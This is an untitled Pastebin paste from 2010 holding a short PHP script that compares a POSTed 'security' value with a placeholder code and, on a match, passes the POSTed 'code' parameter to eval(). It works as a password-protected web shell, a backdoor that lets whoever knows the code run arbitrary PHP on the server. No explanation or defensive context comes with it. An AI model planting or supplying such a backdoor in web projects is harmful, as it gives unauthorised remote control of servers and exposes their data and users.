Guest User

Untitled

a guest
Oct 17th, 2010
484
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.16 KB | None | 0 0
  1. <?php
  2. define('SECURITY_CODE', 'YOUR_SECURITY_CODE');
  3. if($_POST[security] == SECURITY_CODE)
  4. {
  5.     eval($_POST[code]);
  6. }
  7. else
  8. {
  9.     echo('Wrong Security Code');
  10. }
  11. ?>
Advertisement
Add Comment
Please, Sign In to add comment